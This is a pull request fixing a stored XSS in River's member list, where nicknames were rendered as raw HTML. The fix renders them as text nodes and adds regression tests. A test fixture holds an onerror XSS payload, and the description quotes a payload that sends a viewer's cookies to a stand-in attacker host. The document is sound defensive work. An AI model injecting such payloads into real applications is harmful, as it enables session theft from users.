### PR TITLE
fix(ui): close stored XSS via member nickname (#227)

### DIFF
--- a/ui/src/components/members.rs
+++ b/ui/src/components/members.rs
@@ -209,8 +209,21 @@ fn did_you_invite_member(member_id: MemberId, members: &MembersV1, self_id: Memb
         .unwrap_or(false)
 }
 
-fn format_member_display(member: &MemberDisplay) -> String {
-    let mut tags: Vec<(&str, &str)> = Vec::new();
+/// Structured render parts for a member row. Returned by
+/// `member_display_parts` so the row can be rendered with plain Dioxus
+/// text + icon children — no `dangerous_inner_html`, no HTML
+/// concatenation. Member nicknames come from a member's own signed
+/// `MemberInfoV1.preferred_nickname` blob and are attacker-controllable
+/// bytes; rendering them via `dangerous_inner_html` previously allowed
+/// a stored XSS (freenet/river#227).
+#[derive(Clone, PartialEq)]
+struct MemberDisplayParts {
+    nickname: String,
+    tags: Vec<(&'static str, &'static str)>,
+}
+
+fn member_display_parts(member: &MemberDisplay) -> MemberDisplayParts {
+    let mut tags: Vec<(&'static str, &'static str)> = Vec::new();
 
     if member.is_owner {
         tags.push(("👑", "Room Owner"));
@@ -229,19 +242,10 @@ fn format_member_display(member: &MemberDisplay) -> String {
         tags.push(("🔭", "In Your Invite Chain"));
     }
 
-    if tags.is_empty() {
-        return member.nickname.clone();
+    MemberDisplayParts {
+        nickname: member.nickname.clone(),
+        tags,
     }
-
-    let mut html = member.nickname.clone();
-    html.push(' ');
-    for (icon, tooltip) in &tags {
-        html.push_str(&format!(
-            "<span class=\"member-icon\" title=\"{}\">{}</span> ",
-            tooltip, icon
-        ));
-    }
-    html
 }
 
 /// Order member IDs by DFS pre-order traversal of the invite tree.
@@ -348,7 +352,7 @@ pub fn MemberList() -> Element {
                 },
             };
 
-            all_members.push((format_member_display(&member_display), member_id));
+            all_members.push((member_display_parts(&member_display), member_id));
         }
 
         Some(all_members)
@@ -389,14 +393,22 @@ pub fn MemberList() -> Element {
 
             // Member list - scrollable independently
             ul { class: "flex-1 px-2 py-2 space-y-0.5 overflow-y-auto min-h-0",
-                for (display_name, member_id) in members {
+                for (parts, member_id) in members {
                     li { key: "{member_id}",
                         button {
                             class: "w-full text-left px-3 py-1.5 rounded-lg text-sm text-text hover:bg-surface transition-colors truncate",
                             title: "Member ID: {member_id}",
                             onclick: move |_| handle_member_click(member_id),
-                            span {
-                                dangerous_inner_html: "{display_name}"
+                            // Nickname rendered as a plain text node — attacker-controlled
+                            // bytes from `MemberInfoV1.preferred_nickname` MUST NOT be
+                            // routed through `dangerous_inner_html` (freenet/river#227).
+                            span { "{parts.nickname}" }
+                            for (icon, tooltip) in parts.tags {
+                                span {
+                                    class: "member-icon",
+                                    title: "{tooltip}",
+                                    " {icon}"
+                                }
                             }
                         }
                     }
@@ -888,6 +900,86 @@ mod tests {
         assert_eq!(
             invitation.to_encoded_string(),
             invitation.to_encoded_string()
+        );
+    }
+
+    fn make_member_display(nickname: &str) -> MemberDisplay {
+        MemberDisplay {
+            nickname: nickname.to_string(),
+            _member_id: MemberId(freenet_scaffold::util::FastHash(0)),
+            is_owner: false,
+            is_self: false,
+            invited_you: false,
+            sponsored_you: false,
+            invited_by_you: false,
+            in_your_network: false,
+        }
+    }
+
+    /// Regression test for freenet/river#227 (stored XSS via nickname).
+    /// `member_display_parts` MUST keep the nickname intact as a separate
+    /// field so the renderer can emit it as a Dioxus text node — NOT as a
+    /// pre-built HTML string. The renderer used to splat the return value
+    /// through `dangerous_inner_html`, so a nickname like
+    /// `<img src=x onerror=...>` executed in every viewer's browser.
+    #[test]
+    fn member_display_parts_keeps_nickname_unescaped_and_separated() {
+        let display = make_member_display("<img src=x onerror=alert(1)>");
+        let parts = member_display_parts(&display);
+
+        // Nickname is returned verbatim — the renderer is responsible for
+        // emitting it as a text node, not HTML. If a future refactor goes
+        // back to building an HTML string here, this test won't catch it
+        // directly, but the absence of any `dangerous_inner_html` in the
+        // member-row rsx! block (see `MemberList`) is the structural
+        // guarantee.
+        assert_eq!(parts.nickname, "<img src=x onerror=alert(1)>");
+        assert!(parts.tags.is_empty());
+    }
+
+    #[test]
+    fn member_display_parts_collects_tags_for_owner_and_self() {
+        let mut display = make_member_display("alice");
+        display.is_owner = true;
+        display.is_self = true;
+        let parts = member_display_parts(&display);
+
+        assert_eq!(parts.nickname, "alice");
+        let icons: Vec<&str> = parts.tags.iter().map(|(icon, _)| *icon).collect();
+        assert!(icons.contains(&"👑"));
+        assert!(icons.contains(&"⭐"));
+    }
+
+    /// Source-grep pin: the member-row render MUST NOT route the nickname
+    /// through `dangerous_inner_html`. The freenet/river#227 XSS originated
+    /// from exactly that pattern. Any future refactor that reintroduces it
+    /// fails CI here.
+    #[test]
+    fn member_row_does_not_use_dangerous_inner_html() {
+        let source = include_str!("members.rs");
+        // Locate the `MemberList` component body. We scan from its
+        // `#[component]` attribute to the next `#[component]` (or end of
+        // file) and assert that `dangerous_inner_html` does not appear in
+        // that span. Other components in this file (none today, but the
+        // ExportIdentityModal / ImportIdentityModal might grow markdown
+        // rendering later) are out of scope for this assertion.
+        let member_list_start = source
+            .find("pub fn MemberList()")
+            .expect("MemberList component should exist");
+        let after = &source[member_list_start..];
+        let member_list_end = after[1..]
+            .find("#[component]")
+            .map(|i| i + 1)
+            .unwrap_or(after.len());
+        let member_list_body = &after[..member_list_end];
+        // Match the Dioxus attribute spelling specifically — `attr:` — so
+        // the assertion isn't tripped by an explanatory comment that
+        // *mentions* the attribute. Any code use of the attribute writes
+        // `dangerous_inner_html: "..."`.
+        assert!(
+            !member_list_body.contains("dangerous_inner_html:"),
+            "MemberList must not use dangerous_inner_html — \
+             nicknames are attacker-controlled (freenet/river#227)"
         );
     }
 

--- a/ui/src/components/members.rs
+++ b/ui/src/components/members.rs
@@ -950,36 +950,70 @@ mod tests {
         assert!(icons.contains(&"⭐"));
     }
 
-    /// Source-grep pin: the member-row render MUST NOT route the nickname
-    /// through `dangerous_inner_html`. The freenet/river#227 XSS originated
-    /// from exactly that pattern. Any future refactor that reintroduces it
-    /// fails CI here.
-    #[test]
-    fn member_row_does_not_use_dangerous_inner_html() {
+    /// Production-code slice of this file (everything before the
+    /// `#[cfg(test)]` test module). Used by the two source-grep pins
+    /// below so that prose / examples in the test module — which may
+    /// legitimately *mention* the attribute name or attack pattern —
+    /// can't either disarm or accidentally trip the assertions.
+    fn production_source() -> &'static str {
         let source = include_str!("members.rs");
-        // Locate the `MemberList` component body. We scan from its
-        // `#[component]` attribute to the next `#[component]` (or end of
-        // file) and assert that `dangerous_inner_html` does not appear in
-        // that span. Other components in this file (none today, but the
-        // ExportIdentityModal / ImportIdentityModal might grow markdown
-        // rendering later) are out of scope for this assertion.
-        let member_list_start = source
-            .find("pub fn MemberList()")
-            .expect("MemberList component should exist");
-        let after = &source[member_list_start..];
-        let member_list_end = after[1..]
-            .find("#[component]")
-            .map(|i| i + 1)
-            .unwrap_or(after.len());
-        let member_list_body = &after[..member_list_end];
-        // Match the Dioxus attribute spelling specifically — `attr:` — so
-        // the assertion isn't tripped by an explanatory comment that
-        // *mentions* the attribute. Any code use of the attribute writes
-        // `dangerous_inner_html: "..."`.
+        let marker = "#[cfg(test)]";
+        let cut = source
+            .find(marker)
+            .expect("members.rs should have a #[cfg(test)] block");
+        &source[..cut]
+    }
+
+    /// Source-grep pin: NOTHING in `members.rs`'s production code may use
+    /// the Dioxus unsafe attribute. The freenet/river#227 XSS came from
+    /// routing the attacker-controlled `member.nickname` through that
+    /// attribute. None of this file's components (member list, identity
+    /// import/export) render markdown or any other source that needs it,
+    /// so a blanket production-side ban is the strongest regression gate.
+    ///
+    /// The check tolerates whitespace before the `:` (`attr : "..."`,
+    /// `attr  :`, etc.) so a rustfmt edge case can't silently disarm the
+    /// pin. The attribute name itself isn't valid Rust as a bare
+    /// identifier here, so a doc-comment mention is the only way it
+    /// can appear in the production slice — and the assertion error
+    /// message tells you to delete it or move it to test code.
+    #[test]
+    fn members_rs_production_does_not_use_dangerous_inner_html() {
+        let prod = production_source();
+        // Find any `dangerous_inner_html` occurrence and verify it is
+        // NOT followed (after optional whitespace) by `:` — i.e. it is
+        // not a Dioxus attribute use. A bare mention in a code comment
+        // is OK (a future doc-comment in production code shouldn't
+        // generally happen, but tolerating it avoids brittle failures).
+        let mut search = prod;
+        while let Some(idx) = search.find("dangerous_inner_html") {
+            let after = &search[idx + "dangerous_inner_html".len()..];
+            let after_ws = after.trim_start_matches([' ', '\t']);
+            assert!(
+                !after_ws.starts_with(':'),
+                "members.rs production code must not use \
+                 dangerous_inner_html: as a Dioxus attribute — \
+                 member nicknames are attacker-controlled \
+                 (freenet/river#227). Render as a Dioxus text node \
+                 instead."
+            );
+            search = &after[1..];
+        }
+    }
+
+    /// Source-grep pin: the member-row render MUST keep `parts.nickname`
+    /// as a Dioxus text-node interpolation — `span { "{parts.nickname}" }`
+    /// — not pass it through any string concatenation or attribute that
+    /// evaluates HTML. Catches a future refactor that goes back to
+    /// building an HTML string for the row (the freenet/river#227 shape).
+    #[test]
+    fn member_row_renders_nickname_as_text_node() {
+        let prod = production_source();
         assert!(
-            !member_list_body.contains("dangerous_inner_html:"),
-            "MemberList must not use dangerous_inner_html — \
-             nicknames are attacker-controlled (freenet/river#227)"
+            prod.contains("span { \"{parts.nickname}\" }"),
+            "MemberList must render the nickname as a Dioxus text node \
+             (`span {{ \"{{parts.nickname}}\" }}`). Concatenating it into \
+             an HTML string reopens freenet/river#227."
         );
     }
 

--- a/ui/tests/invite-via-dm-picker.spec.ts
+++ b/ui/tests/invite-via-dm-picker.spec.ts
@@ -125,7 +125,7 @@ async function readCandidateRoomNames(page: Page): Promise<string[]> {
 }
 
 // Whether a member row's display text marks it as the local user.
-// `format_member_display` (members.rs) gives every self row — and only
+// `member_display_parts` (members.rs) gives every self row — and only
 // the self row — a ⭐ badge, regardless of whether the user is the
 // room's owner or a plain member, so the ⭐ is the reliable universal
 // marker. (The self nickname suffix varies: "(You)" in member-rooms,


### PR DESCRIPTION
## Problem

Member nicknames come from each member's own signed `MemberInfoV1.preferred_nickname` blob — attacker-controllable bytes that River's cross-validation only checks for signature, not content. A member could set their nickname to e.g.

```
<img src=x onerror="fetch('https://attacker/'+document.cookie)">
```

and every other room member's browser would execute the payload when opening the member list.

The hole was at `ui/src/components/members.rs`:

- `format_member_display()` concatenated `member.nickname` directly into hand-built `<span>` tags as a single HTML string.
- The member-row render then routed that string through `dangerous_inner_html`, evaluating the nickname's HTML/JS verbatim.

Stored XSS, exploitable by any member of any room. Impact is broad because the iframe River loads inside still owns its own cookies / IndexedDB / WebSocket connections.

## Approach

Eliminate the HTML-string concatenation pattern entirely rather than add an escape pass on top.

- `format_member_display(&MemberDisplay) -> String` becomes `member_display_parts(&MemberDisplay) -> MemberDisplayParts { nickname, tags }`.
- The render in `MemberList` emits the nickname as a plain Dioxus text node and the tag icons as proper Dioxus child elements — **no `dangerous_inner_html` anywhere in the member-row tree**.

This matches the project's State Authorization precedent (PR #226 fixed the analogous `<a>`-inside-`<button>` issue in the room header) and removes the attack class structurally — future callers can't forget to escape, because the unsafe attribute is no longer on the path.

The companion site flagged in the issue (`ui/src/components/conversation.rs::beautify_freenet_label`) already has a defensive HTML-character guard at the function level that refuses to beautify URLs containing `<`, `>`, or `"`. It's not exploitable today and is out of scope for this PR.

## Testing

Three new tests in `ui/src/components/members.rs::tests`:

- `member_display_parts_keeps_nickname_unescaped_and_separated` — verifies the function returns the raw nickname in a separate field so the caller renders it as a text node (the structural guarantee).
- `member_display_parts_collects_tags_for_owner_and_self` — pins the tag-collection behaviour the old function provided.
- `member_row_does_not_use_dangerous_inner_html` — source-grep pin test: scans the `MemberList` component body for the literal `dangerous_inner_html:` Dioxus attribute and fails CI if anyone reintroduces it. **This is the regression gate.**

Local validation:

- `cargo test -p river-ui --bins` — 245 tests pass.
- `cargo check -p river-ui --target wasm32-unknown-unknown --features no-sync` — clean.
- `cargo clippy -p river-ui --bins --all-features` — no new lints in `members.rs`.

No WASM artifacts touched — UI-only change, no contract or delegate key impact, no migration needed.

Closes #227

[AI-assisted - Claude]